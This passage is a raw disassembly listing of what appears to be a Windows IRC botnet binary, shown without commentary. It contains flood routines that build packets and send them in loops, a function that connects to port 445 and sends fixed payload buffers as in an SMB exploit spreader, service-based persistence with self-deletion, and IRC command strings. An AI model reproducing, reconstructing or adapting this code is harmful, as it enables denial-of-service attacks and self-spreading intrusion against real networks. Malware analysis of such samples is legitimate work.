rep movsd
xor esi, esi
inc esi
mov [eax+12Ch], esi
mov eax, [ebp+var_250]
mov [ebp+arg_0], eax
lea eax, [ebp+var_1C8]
push eax
call sub_4140CF
push 2
mov [ebp+var_1C], eax
pop ecx
xor ebx, ebx
push 4
mov [ebp+var_C4], ecx
pop eax
mov [ebp+var_BC], 5
push 3
mov [ebp+var_C0], eax
pop edi
mov [ebp+var_B8], 0B4h
push ebx
mov [ebp+var_B4], eax
mov [ebp+var_B0], ecx
mov [ebp+var_AC], 8
mov [ebp+var_A8], 0Ah
mov [ebp+var_A4], ebx
mov [ebp+var_A0], ebx
mov [ebp+var_9C], ebx
mov [ebp+var_98], ebx
mov [ebp+var_94], ebx
mov [ebp+var_90], ebx
mov [ebp+var_8C], ebx
mov [ebp+var_88], ebx
mov [ebp+var_84], esi
mov [ebp+var_80], edi
mov [ebp+var_7C], edi
mov [ebp+var_78], ebx
mov [ebp+var_8], ebx
call sub_4241D4
pop ecx
mov [ebp+var_18], eax
pop ecx
push 0FFh
push edi
push 2
call dword_42F29C ; socket
cmp eax, ebx
mov [ebp+var_10], eax
jge short loc_4115D7
push eax
call dword_42F298 ; closesocket
push [ebp+var_134]
call sub_41C059
pop ecx
mov esi, offset dword_439638
mov ecx, [ebp+arg_0]
push esi
call sub_41074B
mov ecx, [ebp+arg_0]
push offset dword_43963C
push esi
call sub_410720
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4115D7: ; CODE XREF: sub_4114B5+E8�j
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_41160A
push offset aStopped_ ; "Stopped."
push 8
push ebx
push ebx
push [ebp+var_130]
lea eax, [ebp+var_248]
push [ebp+var_12C]
push [ebp+arg_0]
push eax
call sub_41C090
add esp, 20h
loc_41160A: ; CODE XREF: sub_4114B5+12C�j
xor eax, eax
loc_41160C: ; CODE XREF: sub_4114B5+166�j
mov cl, byte ptr [ebp+eax*4+var_C4]
mov [ebp+eax+var_30], cl
inc eax
cmp eax, 14h
jl short loc_41160C
lea eax, [ebp+var_1C8]
push eax
call dword_42F274 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov edi, [eax]
and edi, 0FFFFFFh
call sub_4220FC
cdq
mov ecx, 0FFh
push [ebp+var_13C]
idiv ecx
mov eax, [ebp+var_138]
or [ebp+var_68], cl
mov [ebp+var_14], eax
mov eax, [ebp+var_74]
and al, 45h
mov [ebp+var_48], si
mov esi, dword_42F2B8
or al, 45h
mov [ebp+var_74], eax
mov [ebp+var_70], 10h
mov [ebp+var_6A], 40h
mov [ebp+var_67], 6
mov [ebp+var_54], ebx
mov [ebp+var_4E], 0Ah
mov [ebp+var_50], bx
mov [ebp+var_3A], bx
mov [ebp+var_3C], bx
mov [ebp+var_40], bx
mov [ebp+var_42], bx
mov [ebp+var_44], bx
mov [ebp+var_46], bx
mov [ebp+var_4A], bx
mov [ebp+var_38], 787Dh
mov [ebp+var_34], bx
shl edx, 18h
or edi, edx
call esi ; dword_42F2B8
movzx eax, ax
mov [ebp+var_C], eax
loc_4116B8: ; CODE XREF: sub_4114B5+344�j
call sub_4220FC
cmp [ebp+var_13C], ebx
mov [ebp+var_4], eax
jnz short loc_4116D0
call sub_4220FC
mov [ebp+var_C], eax
loc_4116D0: ; CODE XREF: sub_4114B5+211�j
push 3Ch
call esi ; dword_42F2B8
mov [ebp+var_6E], ax
call sub_4220FC
mov [ebp+var_6C], ax
mov eax, [ebp+var_1C]
mov [ebp+var_60], eax
mov ax, word ptr [ebp+var_4]
mov [ebp+var_5C], ax
mov ax, word ptr [ebp+var_C]
mov [ebp+var_64], edi
mov [ebp+var_66], bx
mov [ebp+var_5A], ax
call sub_4220FC
mov [ebp+var_58], eax
mov ax, word ptr [ebp+var_C]
mov [ebp+var_D2], ax
mov eax, [ebp+var_60]
mov [ebp+var_D0], eax
lea eax, [ebp+var_74]
push 14h
push eax
mov [ebp+var_36], bx
mov [ebp+var_D4], 2
call sub_414271
pop ecx
mov [ebp+var_66], ax
pop ecx
call sub_4220FC
mov [ebp+var_4], eax
mov [ebp+var_27], al
mov al, byte ptr [ebp+var_4+2]
mov [ebp+var_26], ah
mov [ebp+var_25], al
mov al, byte ptr [ebp+var_4+3]
mov [ebp+var_24], al
mov eax, [ebp+var_64]
mov [ebp+var_120], eax
mov eax, [ebp+var_60]
push 28h
mov [ebp+var_11C], eax
mov [ebp+var_118], bl
mov [ebp+var_117], 6
call esi ; dword_42F2B8
mov [ebp+var_116], ax
lea eax, [ebp+var_114]
push 14h
push eax
lea eax, [ebp+var_5C]
push eax
call sub_4223F0
lea eax, [ebp+var_E8]
push 14h
push eax
lea eax, [ebp+var_30]
push eax
call sub_4223F0
lea eax, [ebp+var_120]
push 34h
push eax
call sub_414271
add esp, 20h
mov [ebp+var_36], ax
lea eax, [ebp+var_D4]
push 10h
push eax
push ebx
lea eax, [ebp+var_74]
push 3Ch
push eax
push [ebp+var_10]
call dword_42F2A4 ; sendto
cmp [ebp+var_8], 32h
jb short loc_4117EA
push ebx
call sub_4241D4
mov edx, [ebp+var_18]
pop ecx
mov ecx, [ebp+var_14]
add ecx, edx
cmp eax, ecx
jnb short loc_4117FE
mov [ebp+var_8], ebx
loc_4117EA: ; CODE XREF: sub_4114B5+31D�j
push [ebp+var_140]
inc [ebp+var_8]
call dword_42F15C ; Sleep
jmp loc_4116B8
; ---------------------------------------------------------------------------
loc_4117FE: ; CODE XREF: sub_4114B5+330�j
push [ebp+var_10]
mov esi, dword_42F298
call esi ; dword_42F298
cmp [ebp+var_12C], ebx
mov edi, offset aSDone ; "%s done"
jnz short loc_411836
cmp [ebp+var_130], ebx
jnz short loc_41183E
push offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
lea eax, [ebp+var_248]
push edi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 10h
loc_411836: ; CODE XREF: sub_4114B5+35F�j
cmp [ebp+var_130], ebx
jz short loc_411856
loc_41183E: ; CODE XREF: sub_4114B5+367�j
push offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
lea eax, [ebp+var_248]
push edi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 10h
loc_411856: ; CODE XREF: sub_4114B5+387�j
push [ebp+var_10]
call esi ; dword_42F298
push [ebp+var_134]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
sub_4114B5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41186E proc near ; DATA XREF: sub_403B2C+5706�o
var_15C = dword ptr -15Ch
var_154 = byte ptr -154h
var_D4 = byte ptr -0D4h
var_4C = dword ptr -4Ch
var_48 = word ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 15Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_15C]
rep movsd
xor edi, edi
mov ebx, 1A0Ah
inc edi
xor esi, esi
mov [eax+12Ch], edi
mov eax, [ebp+var_15C]
push ebx
mov [ebp+arg_0], eax
mov [ebp+var_C], edi
mov [ebp+var_8], esi
call sub_422F79
push esi
mov [ebp+var_14], eax
call sub_4241D4
mov [ebp+var_18], eax
mov eax, [ebp+var_44]
mov [ebp+var_1C], eax
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_4221F0
lea eax, [ebp+var_D4]
push eax
call sub_4140CF
mov esi, dword_42F164
mov [ebp+var_28], eax
mov ax, [ebp+var_48]
add esp, 18h
mov [ebp+var_2C], 2
mov [ebp+var_2A], ax
call esi ; dword_42F164
mov [ebp+var_10], eax
jmp loc_4119AD
; ---------------------------------------------------------------------------
loc_4118FD: ; CODE XREF: sub_41186E+150�j
call sub_4220FC
push 11h
push 2
push 2
mov [ebp+var_2A], ax
call dword_42F29C ; socket
test eax, eax
mov [ebp+var_4], eax
jl loc_411A29
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_41194C
push offset aStopped_ ; "Stopped."
push 8
push 0
push 0
push [ebp+var_3C]
lea eax, [ebp+var_154]
push [ebp+var_38]
push [ebp+arg_0]
push eax
call sub_41C090
add esp, 20h
loc_41194C: ; CODE XREF: sub_41186E+B9�j
lea eax, [ebp+var_C]
push 4
push eax
push 8004667Eh
push 11h
mov [ebp+var_C], edi
push [ebp+var_4]
call dword_42F2B4 ; setsockopt
lea eax, [ebp+var_2C]
push 10h
push eax
push 0
push ebx
push [ebp+var_14]
push [ebp+var_4]
call dword_42F2A4 ; sendto
push [ebp+var_4]
call sub_4265E4
cmp [ebp+var_8], 32h
pop ecx
jl short loc_4119A1
push 0
call sub_4241D4
mov edx, [ebp+var_18]
pop ecx
mov ecx, [ebp+var_1C]
add ecx, edx
cmp eax, ecx
jnb short loc_4119C4
and [ebp+var_8], 0
loc_4119A1: ; CODE XREF: sub_41186E+119�j
push [ebp+var_4C]
inc [ebp+var_8]
call dword_42F15C ; Sleep
loc_4119AD: ; CODE XREF: sub_41186E+8A�j
call esi ; dword_42F164
sub eax, [ebp+var_10]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_44]
jbe loc_4118FD
loc_4119C4: ; CODE XREF: sub_41186E+12D�j
push [ebp+var_4]
call sub_4265E4
xor ebx, ebx
pop ecx
cmp [ebp+var_38], ebx
mov edi, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
mov esi, offset aSDone ; "%s done"
jnz short loc_4119F7
cmp [ebp+var_3C], ebx
jnz short loc_4119FC
push edi
lea eax, [ebp+var_154]
push esi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 10h
loc_4119F7: ; CODE XREF: sub_41186E+16E�j
cmp [ebp+var_3C], ebx
jz short loc_411A10
loc_4119FC: ; CODE XREF: sub_41186E+173�j
push edi
lea eax, [ebp+var_154]
push esi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 10h
loc_411A10: ; CODE XREF: sub_41186E+18C�j
push [ebp+var_4]
call dword_42F298 ; closesocket
push [ebp+var_40]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
loc_411A29: ; CODE XREF: sub_41186E+A9�j
push eax
call dword_42F298 ; closesocket
push [ebp+var_40]
call sub_41C059
pop ecx
mov esi, offset dword_439638
mov ecx, [ebp+arg_0]
push esi
call sub_41074B
mov ecx, [ebp+arg_0]
push offset dword_43963C
push esi
call sub_410720
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_41186E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A5E proc near ; CODE XREF: .text:00411FA2�p
; .text:00411FD1�p
var_89AC = byte ptr -89ACh
var_8944 = byte ptr -8944h
var_68D4 = byte ptr -68D4h
var_6864 = byte ptr -6864h
var_5DA0 = byte ptr -5DA0h
var_47FC = byte ptr -47FCh
var_47FB = byte ptr -47FBh
var_3768 = byte ptr -3768h
var_2CA4 = byte ptr -2CA4h
var_2CA3 = byte ptr -2CA3h
var_2CA0 = byte ptr -2CA0h
var_24BC = byte ptr -24BCh
var_24AC = byte ptr -24ACh
var_2188 = byte ptr -2188h
var_2184 = byte ptr -2184h
var_2178 = byte ptr -2178h
var_1EF0 = byte ptr -1EF0h
var_1E74 = byte ptr -1E74h
var_16A4 = byte ptr -16A4h
var_11F9 = byte ptr -11F9h
var_F0C = byte ptr -0F0Ch
var_E6C = byte ptr -0E6Ch
var_760 = dword ptr -760h
var_750 = byte ptr -750h
var_73C = byte ptr -73Ch
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_AC = byte ptr -0ACh
var_A9 = byte ptr -0A9h
var_7F = byte ptr -7Fh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_D0 = dword ptr 0D8h
arg_D4 = dword ptr 0DCh
push ebp
mov ebp, esp
mov eax, 89ACh
call sub_4220C0
mov eax, dword_439004
push ebx
mov [ebp+var_C], eax
mov eax, dword_439008
mov [ebp+var_8], eax
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_34]
push offset loc_438FF8
push eax
call sub_422063
add esp, 0Ch
xor eax, eax
loc_411A95: ; CODE XREF: sub_411A5E+4E�j
mov cl, [ebp+eax+var_34]
and [ebp+eax*2+var_FB], 0
mov [ebp+eax*2+var_FC], cl
inc eax
cmp eax, 28h
jl short loc_411A95
push 60h
lea eax, [ebp+var_AC]
push offset dword_438BD0
push eax
call sub_4223F0
lea eax, [ebp+var_34]
push eax
call sub_422120
add eax, eax
push eax
lea eax, [ebp+var_FC]
push eax
lea eax, [ebp+var_7C]
push eax
call sub_4223F0
add esp, 1Ch
lea eax, [ebp+var_34]
push 9
push (offset aC_0+3)
push eax
call sub_422120
pop ecx
lea eax, [ebp+eax*2+var_7D]
push eax
call sub_4223F0
lea eax, [ebp+var_34]
push eax
call sub_422120
add al, 1Ah
push 1
add al, al
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_A9]
push eax
call sub_4223F0
lea eax, [ebp+var_34]
push eax
call sub_422120
add al, al
push 1
add al, 9
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_7F]
push eax
call sub_4223F0
mov esi, [ebp+arg_D4]
add esp, 2Ch
test esi, esi
jz loc_411C22
mov edi, 0DACh
lea eax, [ebp+var_2CA0]
push edi
push 90h
push eax
call sub_4221F0
lea ebx, ds:438FDCh[esi*8]
push 4
lea eax, [ebp+var_24BC]
push ebx
push eax
call sub_4223F0
mov esi, offset dword_432980
push esi
call sub_422120
push eax
lea eax, [ebp+var_24AC]
push esi
push eax
call sub_4223F0
push 4
lea eax, [ebp+var_2188]
push offset loc_438FF0
push eax
call sub_4223F0
push 4
lea eax, [ebp+var_2184]
push ebx
push eax
call sub_4223F0
add esp, 40h
push esi
call sub_422120
push eax
lea eax, [ebp+var_2178]
push esi
push eax
call sub_4223F0
add esp, 10h
xor eax, eax
loc_411BD1: ; CODE XREF: sub_411A5E+18C�j
mov cl, [ebp+eax+var_2CA0]
and [ebp+eax*2+var_47FB], 0
mov [ebp+eax*2+var_47FC], cl
inc eax
cmp eax, edi
jl short loc_411BD1
and [ebp+var_2CA4], 0
and [ebp+var_2CA3], 0
mov esi, 1C52h
lea eax, [ebp+var_89AC]
push esi
push 31h
push eax
call sub_4221F0
push esi
lea eax, [ebp+var_68D4]
push 31h
push eax
call sub_4221F0
add esp, 18h
jmp short loc_411C79
; ---------------------------------------------------------------------------
loc_411C22: ; CODE XREF: sub_411A5E+E9�j
push 7D0h
lea eax, [ebp+var_F0C]
push 90h
push eax
call sub_4221F0
mov esi, offset dword_432980
push esi
call sub_422120
push eax
lea eax, [ebp+var_E6C]
push esi
push eax
call sub_4223F0
lea eax, [ebp+var_C]
push eax
call sub_422120
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_750]
push eax
call sub_4223F0
mov eax, dword_438FDC
add esp, 2Ch
mov [ebp+var_760], eax
loc_411C79: ; CODE XREF: sub_411A5E+1C2�j
push 0E29h
lea eax, [ebp+var_1EF0]
push 31h
push eax
call sub_4221F0
movsx eax, [ebp+var_1]
add esp, 0Ch
add eax, 4
mov esi, dword_42F288
push 0
push eax
lea eax, [ebp+var_AC]
push eax
push [ebp+arg_D0]
call esi ; dword_42F288
cmp eax, 0FFFFFFFFh
jz loc_411E51
mov edi, dword_42F28C
mov ebx, 640h
push 0
lea eax, [ebp+var_73C]
push ebx
push eax
push [ebp+arg_D0]
call edi ; dword_42F28C
push 0
push 68h
push offset dword_438C38
push [ebp+arg_D0]
call esi ; dword_42F288
cmp eax, 0FFFFFFFFh
jz loc_411E51
push 0
lea eax, [ebp+var_73C]
push ebx
push eax
push [ebp+arg_D0]
call edi ; dword_42F28C
push 0
push 0A0h
push offset dword_438CA8
push [ebp+arg_D0]
call esi ; dword_42F288
cmp eax, 0FFFFFFFFh
jz loc_411E51
push 0
lea eax, [ebp+var_73C]
push ebx
push eax
push [ebp+arg_D0]
call edi ; dword_42F28C
cmp [ebp+arg_D4], 0
jz loc_411DEB
push 68h
lea eax, [ebp+var_89AC]
push offset dword_438E68
push eax
call sub_4223F0
lea eax, [ebp+var_47FC]
push 1B5Ah
push eax
lea eax, [ebp+var_8944]
push eax
call sub_4223F0
push 70h
lea eax, [ebp+var_68D4]
push offset dword_438ED8
push eax
call sub_4223F0
lea eax, [ebp+var_3768]
push 0A5Eh
push eax
lea eax, [ebp+var_6864]
push eax
call sub_4223F0
push 84h
lea eax, [ebp+var_5DA0]
push offset dword_438F50
push eax
call sub_4223F0
add esp, 3Ch
lea eax, [ebp+var_89AC]
push 0
push 10FCh
push eax
push [ebp+arg_D0]
call esi ; dword_42F288
cmp eax, 0FFFFFFFFh
jz loc_411E51
push 0
lea eax, [ebp+var_73C]
push ebx
push eax
push [ebp+arg_D0]
call edi ; dword_42F28C
push 0
push 0FDCh
lea eax, [ebp+var_68D4]
jmp short loc_411E43
; ---------------------------------------------------------------------------
loc_411DEB: ; CODE XREF: sub_411A5E+2D8�j
push 7Ch
lea eax, [ebp+var_1EF0]
push offset dword_438D50
push eax
call sub_4223F0
lea eax, [ebp+var_F0C]
push 7D0h
push eax
lea eax, [ebp+var_1E74]
push eax
call sub_4223F0
push 90h
lea eax, [ebp+var_16A4]
push offset off_438DD0
push eax
call sub_4223F0
add esp, 24h
and [ebp+var_11F9], 0
lea eax, [ebp+var_1EF0]
push 0
push 0CF8h
loc_411E43: ; CODE XREF: sub_411A5E+38B�j
push eax
push [ebp+arg_D0]
call esi ; dword_42F288
cmp eax, 0FFFFFFFFh
jnz short loc_411E55
loc_411E51: ; CODE XREF: sub_411A5E+253�j
; sub_411A5E+28A�j ...
xor eax, eax
jmp short loc_411E8A
; ---------------------------------------------------------------------------
loc_411E55: ; CODE XREF: sub_411A5E+3F1�j
movzx eax, word_439014
push eax
lea esi, [ebp+arg_0]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_401160
add esp, 0D4h
test eax, eax
jz short loc_411E87
push 7D0h
call dword_42F15C ; Sleep
loc_411E87: ; CODE XREF: sub_411A5E+41C�j
xor eax, eax
inc eax
loc_411E8A: ; CODE XREF: sub_411A5E+3F5�j
pop edi
pop esi
pop ebx
leave
retn
sub_411A5E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 65Ch
push ebx
push esi
push edi
lea eax, [ebp+10h]
push 1
push eax
call sub_401AB3
mov [ebp-0Ch], eax
xor edi, edi
push 10h
lea eax, [ebp-1Ch]
push edi
push eax
mov [ebp-8], edi
call sub_4221F0
add esp, 14h
lea eax, [ebp+10h]
mov word ptr [ebp-1Ch], 2
push eax
call dword_42F2AC ; inet_addr
push 1BDh
mov [ebp-18h], eax
call dword_42F2B8 ; ntohs
push 6
push 1
push 2
mov [ebp-1Ah], ax
call dword_42F29C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp-4], esi
jz short loc_411F72
lea eax, [ebp-1Ch]
push 10h
push eax
push esi
call dword_42F294 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_411F72
mov ebx, dword_42F288
push edi
push 89h
push offset dword_4389B0
push esi
call ebx ; dword_42F288
cmp eax, 0FFFFFFFFh
jz short loc_411F72
push edi
mov edi, 640h
lea eax, [ebp-65Ch]
push edi
push eax
push esi
mov esi, dword_42F28C
call esi ; dword_42F28C
push 0
push 0A8h
push offset dword_438A40
push dword ptr [ebp-4]
call ebx ; dword_42F288
cmp eax, 0FFFFFFFFh
jz short loc_411F72
push 0
lea eax, [ebp-65Ch]
push edi
push eax
push dword ptr [ebp-4]
call esi ; dword_42F28C
push 0
push 0DEh
push offset dword_438AF0
push dword ptr [ebp-4]
call ebx ; dword_42F288
cmp eax, 0FFFFFFFFh
jnz short loc_411F79
loc_411F72: ; CODE XREF: .text:00411EF3�j
; .text:00411F05�j ...
xor eax, eax
jmp loc_41203A
; ---------------------------------------------------------------------------
loc_411F79: ; CODE XREF: .text:00411F70�j
mov ebx, [ebp-4]
push 0
lea eax, [ebp-65Ch]
push edi
push eax
push ebx
call esi ; dword_42F28C
cmp dword ptr [ebp-0Ch], 2
jnz short loc_411FB8
push 1
push ebx
sub esp, 0D0h
lea esi, [ebp+10h]
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_411A5E
add esp, 0D8h
test eax, eax
jz short loc_411FE7
mov dword ptr [ebp-8], 1
loc_411FB8: ; CODE XREF: .text:00411F8D�j
cmp dword ptr [ebp-0Ch], 3
jnz short loc_411FE7
push 0
push ebx
sub esp, 0D0h
lea esi, [ebp+10h]
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_411A5E
add esp, 0D8h
test eax, eax
jz short loc_411FE7
mov dword ptr [ebp-8], 1
loc_411FE7: ; CODE XREF: .text:00411FAF�j
; .text:00411FBC�j ...
push ebx
call dword_42F298 ; closesocket
cmp dword ptr [ebp-8], 0
jz short loc_412037
mov eax, [ebp+0C8h]
lea eax, [eax+eax*8]
shl eax, 3
lea ecx, dword_432090[eax]
inc dword ptr [ecx]
cmp dword ptr [ebp+0D8h], 0
mov ecx, [ecx]
jz short loc_412037
push ecx
lea ecx, [ebp+10h]
lea eax, dword_432069[eax]
push ecx
push eax
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push offset aSSSExD ; "%s %s -> %s (Ex: %d)"
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_4104F6
add esp, 1Ch
loc_412037: ; CODE XREF: .text:00411FF2�j
; .text:00412011�j
xor eax, eax
inc eax
loc_41203A: ; CODE XREF: .text:00411F74�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41203F: ; DATA XREF: .text:00432008�o
call sub_412049
jmp loc_412053
; =============== S U B R O U T I N E =======================================
sub_412049 proc near ; CODE XREF: .text:loc_41203F�p
; FUNCTION CHUNK AT 0040FAFF SIZE 00000020 BYTES
mov ecx, offset dword_4554B0
jmp loc_40FAFF
sub_412049 endp
; ---------------------------------------------------------------------------
loc_412053: ; CODE XREF: .text:00412044�j
push offset loc_41205F
call sub_42321A
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41205F: ; DATA XREF: .text:loc_412053�o
mov ecx, offset dword_4554B0
jmp loc_40FB1F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412069 proc near ; CODE XREF: sub_403B2C+63C�p
; sub_412267+150�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_454750
mov edi, 0B8h
loc_41207D: ; CODE XREF: sub_412069+33�j
cmp byte ptr [esi], 0
jz short loc_4120A0
push [ebp+arg_0]
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_4120A0
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_4552D0
jl short loc_41207D
jmp short loc_4120E2
; ---------------------------------------------------------------------------
loc_4120A0: ; CODE XREF: sub_412069+17�j
; sub_412069+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_454750[esi]
push ebx
call sub_4221F0
push 17h
push [ebp+arg_0]
push ebx
call sub_4222F0
push 9Fh
lea eax, dword_454768[esi]
push [ebp+arg_4]
push eax
call sub_4222F0
add esp, 24h
inc dword_43C178
pop ebx
loc_4120E2: ; CODE XREF: sub_412069+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_412069 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4120E9 proc near ; CODE XREF: .text:00424F9E�p
var_620 = byte ptr -620h
var_420 = byte ptr -420h
var_31C = byte ptr -31Ch
var_218 = byte ptr -218h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 620h
push esi
push edi
call sub_40BB43
call sub_41FB50
test eax, eax
jz short loc_412112
push 1
call sub_41F331
pop ecx
push 1
call dword_42F06C ; ExitProcess
loc_412112: ; CODE XREF: sub_4120E9+17�j
push ebx
push dword_43C170
push dword_43C174
call sub_41D499
pop ecx
pop ecx
call sub_41D98A
xor ebx, ebx
push 2
mov [ebp+var_10], offset dword_439068
mov [ebp+var_C], offset sub_41B387
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
call dword_4543C0 ; SetErrorMode
lea eax, [ebp+var_420]
push 104h
push eax
push ebx
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
push 40h
xor eax, eax
pop ecx
lea edi, [ebp+var_113]
mov [ebp+var_114], bl
push ebx
rep stosd
push dword_439018
stosw
stosb
lea eax, [ebp+var_114]
push eax
push ebx
call dword_42F234
mov esi, dword_42F04C
lea eax, [ebp+var_114]
push eax
push offset dword_4553A8
call esi ; dword_42F04C
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_218]
push eax
call esi ; dword_42F04C
mov esi, offset loc_439030
lea eax, [ebp+var_218]
push esi
push eax
mov edi, offset dword_43C270
lea eax, [ebp+var_31C]
push edi
push eax
call sub_422063
lea eax, [ebp+var_218]
push esi
push eax
call sub_41F01F
add esp, 18h
test eax, eax
pop ebx
jz short loc_41221B
lea eax, [ebp+var_420]
push 1
push eax
push offset byte_43B13B
push offset dword_43B03C
push dword_43B038
call sub_41A8F2
lea eax, [ebp+var_31C]
push eax
call sub_41B424
add esp, 18h
push 1
call dword_42F06C ; ExitProcess
loc_41221B: ; CODE XREF: sub_4120E9+FB�j
lea eax, [ebp+var_218]
push esi
push eax
lea eax, [ebp+var_620]
push edi
push eax
call sub_422063
lea eax, [ebp+var_620]
push eax
push offset dword_439540
call sub_414F35
add esp, 18h
lea eax, [ebp+var_10]
push eax
call dword_4543D0 ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_41225F
lea eax, [ebp+var_31C]
push eax
call sub_41B424
pop ecx
loc_41225F: ; CODE XREF: sub_4120E9+167�j
pop edi
xor eax, eax
pop esi
leave
retn 10h
sub_4120E9 endp
; =============== S U B R O U T I N E =======================================
sub_412267 proc near ; DATA XREF: sub_41B537+C�o
; sub_41B69D+15F�o
var_3D8 = dword ptr -3D8h
var_3D4 = dword ptr -3D4h
var_3D0 = byte ptr -3D0h
var_338 = dword ptr -338h
var_190 = byte ptr -190h
sub esp, 3D8h
push ebx
push ebp
push esi
push edi
push 7530h
xor ebx, ebx
push offset loc_43901C
push ebx
push ebx
call dword_42F090 ; CreateMutexA
push eax
call dword_42F064 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_41229B
push 1
call dword_42F06C ; ExitProcess
loc_41229B: ; CODE XREF: sub_412267+2A�j
push offset aH08_Drzwx_ ; "h/08./drzWX."
push offset aSMainThread ; "%s Main thread"
push ebx
call sub_41BED7
xor edi, edi
mov ebp, offset dword_43B03C
inc edi
push edi
push offset byte_43B13B
push ebp
push dword_43B038
call sub_41A829
mov esi, eax
add esp, 1Ch
cmp esi, ebx
jz short loc_41231C
push 80h
push esi
call dword_42F08C ; SetFileAttributesA
mov [esp+3E8h+var_3D4], ebx
jmp short loc_4122FD
; ---------------------------------------------------------------------------
loc_4122E0: ; CODE XREF: sub_412267+9F�j
cmp [esp+3E8h+var_3D4], 3
jge short loc_412308
push esi
call dword_42F088 ; DeleteFileA
inc [esp+3E8h+var_3D4]
push 7D0h
call dword_42F15C ; Sleep
loc_4122FD: ; CODE XREF: sub_412267+77�j
push esi
call sub_41EF49
test eax, eax
pop ecx
jnz short loc_4122E0
loc_412308: ; CODE XREF: sub_412267+7E�j
push offset byte_43B13B
push ebp
push dword_43B038
call sub_41A454
add esp, 0Ch
loc_41231C: ; CODE XREF: sub_412267+65�j
mov esi, dword_42F164
call esi ; dword_42F164
push eax
call sub_4220EF
pop ecx
call esi ; dword_42F164
mov dword_4554F0, eax
lea eax, [esp+3E8h+var_190]
push eax
push 102h
call dword_454274 ; WSAStartup
test eax, eax
jz short loc_412351
push 0FFFFFFFEh
call dword_42F06C ; ExitProcess
loc_412351: ; CODE XREF: sub_412267+E0�j
push offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
push offset aSAutosecure ; "%s AutoSecure"
push 2
mov [esp+3F4h+var_3D8], ebx
mov [esp+3F4h+var_338], edi
call sub_41BED7
add esp, 0Ch
mov esi, eax
lea eax, [esp+3E8h+var_3D8]
mov ebp, dword_42F158
push eax
lea eax, [esp+3ECh+var_3D0]
push ebx
push eax
push offset sub_41B226
push ebx
push ebx
call ebp ; dword_42F158
imul esi, 1018h
mov dword_46D414[esi], eax
call sub_40203F
push 0B80h
push ebx
push offset dword_454750
call sub_4221F0
push offset aRPrivmsg1GodDa ; "r PRIVMSG $1 god damnit,hard bitchslaps"...
push offset aSlaps ; "slaps"
call sub_412069
push offset aRPrivmsg1Slaps ; "r PRIVMSG $1 slaps for You!!"
push offset aSlap ; "slap"
call sub_412069
push offset dword_43C76C
push offset dword_43C768
call sub_412069
push offset dword_43C760
